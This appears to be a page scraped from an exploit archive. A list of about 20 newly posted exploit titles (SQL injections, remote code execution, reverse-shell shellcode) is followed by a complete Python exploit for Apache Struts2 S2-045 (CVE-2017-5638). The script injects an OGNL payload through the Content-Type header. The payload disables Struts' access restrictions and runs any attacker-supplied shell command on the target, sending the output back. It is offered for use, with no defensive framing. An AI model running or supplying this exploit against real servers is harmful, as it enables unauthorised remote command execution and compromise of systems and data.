
20 new exploits Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service Apache Struts2 - Skill Name Remote Code Execution Apache Struts 2 - Skill Name Remote Code Execution Linux - Reverse Shell Shellcode (65 bytes) Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes) Linux - TCP Reverse Shell Shellcode (65 bytes) Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes) Windows x86 - Executable Directory Search Shellcode (130 bytes) Apache Struts2 < 2.3.1 - Multiple Vulnerabilities Apache Struts 2 < 2.3.1 - Multiple Vulnerabilities Country on Sale Script - SQL Injection Media Search Engine Script - 'search' Parameter SQL Injection Soundify 1.1 - 'tid' Parameter SQL Injection BistroStays 3.0 - 'guests' Parameter SQL Injection Nlance 2.2 - SQL Injection Busewe 1.2 - SQL Injection Fashmark 1.2 - 'category' Parameter SQL Injection TradeMart 1.1 - SQL Injection Drupal 7.x Module Services - Remote Code Execution WordPress Plugin Mac Photo Gallery 3.0 - Arbitrary File Download WordPress Plugin Apptha Slider Gallery 1.0 - SQL Injection WordPress Plugin Apptha Slider Gallery 1.0 - Arbitrary File Download WordPress Plugin PICA Photo Gallery 1.0 - SQL Injection Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Cross-Site Scripting ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Remote Code Execution FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery
47 lines
No EOL
1.8 KiB
Python
Executable file
47 lines
No EOL
1.8 KiB
Python
Executable file
#!/usr/bin/python
|
|
# -*- coding: utf-8 -*-
|
|
|
|
import urllib2
|
|
import httplib
|
|
|
|
|
|
def exploit(url, cmd):
|
|
payload = "%{(#_='multipart/form-data')."
|
|
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
|
|
payload += "(#_memberAccess?"
|
|
payload += "(#_memberAccess=#dm):"
|
|
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
|
|
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
|
|
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
|
|
payload += "(#ognlUtil.getExcludedClasses().clear())."
|
|
payload += "(#context.setMemberAccess(#dm))))."
|
|
payload += "(#cmd='%s')." % cmd
|
|
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
|
|
payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
|
|
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
|
|
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
|
|
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
|
|
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
|
|
payload += "(#ros.flush())}"
|
|
|
|
try:
|
|
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
|
|
request = urllib2.Request(url, headers=headers)
|
|
page = urllib2.urlopen(request).read()
|
|
except httplib.IncompleteRead, e:
|
|
page = e.partial
|
|
|
|
print(page)
|
|
return page
|
|
|
|
|
|
if __name__ == '__main__':
|
|
import sys
|
|
if len(sys.argv) != 3:
|
|
print("[*] struts2_S2-045.py <url> <cmd>")
|
|
else:
|
|
print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
|
|
url = sys.argv[1]
|
|
cmd = sys.argv[2]
|
|
print("[*] cmd: %s\n" % cmd)
|
|
exploit(url, cmd) |